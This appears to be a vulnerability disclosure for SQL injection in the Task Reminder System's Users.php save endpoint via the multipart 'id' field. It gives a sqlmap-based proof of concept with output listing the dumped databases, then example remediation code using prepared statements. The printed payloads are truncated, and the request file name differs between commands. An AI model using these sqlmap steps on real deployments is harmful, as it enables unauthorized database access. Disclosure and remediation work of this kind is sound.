Task Reminder System (save)
Details
Related Code file:
/php-trs/classes/Users.php?f=save
Injection parameter:
MULTIPART id
POC
Intercept the request using Burpsuite Proxy.
Save the request to save.txt.
Verify vulnerability
sqlmap -r save.txt --batch
Parameter: MULTIPART id ((custom) POST)
Type: error-based
Title: MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)
Payload: -----------------------------358921456726172311441958711310
Content-Disposition: form-data; name="id"
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: -----------------------------358921456726172311441958711310
Content-Disposition: form-data; name="id"
Dump databases
sqlmap -r save_reminder.txt --batch --dbs
[04:19:54] [INFO] fetching database names
[04:19:54] [INFO] retrieved: 'information_schema'
[04:19:54] [INFO] retrieved: 'trs'
available databases [2]:
[*] information_schema
[*] trs
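Remediation
The following is an added example, not code from the project: one way a save handler can treat the multipart id field so that neither technique reported above applies. It assumes a mysqli connection; the users table, its column names, and the function names parse_id, save_user and handle_save are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: table and column names below are assumptions, not the project's schema.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // make mysqli throw on errors

// An empty id means "create"; anything else must be a positive integer.
function parse_id($raw): ?int
{
    if ($raw === null || $raw === '') {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    return $id;
}

// Insert or update with bound parameters, so form values never become SQL text.
function save_user(mysqli $db, array $post): int
{
    $id    = parse_id($post['id'] ?? null);
    $first = (string)($post['firstname'] ?? '');
    $last  = (string)($post['lastname'] ?? '');
    $user  = (string)($post['username'] ?? '');
    if ($id === null) {
        $stmt = $db->prepare('INSERT INTO users (firstname, lastname, username) VALUES (?, ?, ?)');
        $stmt->bind_param('sss', $first, $last, $user);
    } else {
        $stmt = $db->prepare('UPDATE users SET firstname = ?, lastname = ?, username = ? WHERE id = ?');
        $stmt->bind_param('sssi', $first, $last, $user, $id);
    }
    $stmt->execute();
    return $id ?? (int)$db->insert_id;
}

// Request handler: database errors are logged server-side and never echoed,
// which removes the channel the error-based technique reads from.
function handle_save(mysqli $db, array $post): string
{
    try {
        return json_encode(['status' => 'success', 'id' => save_user($db, $post)]);
    } catch (InvalidArgumentException $e) {
        return json_encode(['status' => 'failed', 'msg' => 'Invalid id.']);
    } catch (mysqli_sql_exception $e) {
        error_log('save_user: ' . $e->getMessage());
        return json_encode(['status' => 'failed', 'msg' => 'Could not save the record.']);
    }
}
```

PHP parses multipart/form-data bodies into $_POST, so the handler would be called as handle_save($conn, $_POST); the integer check rejects any non-numeric id before a statement is prepared, and the bound parameter keeps the value out of the query text.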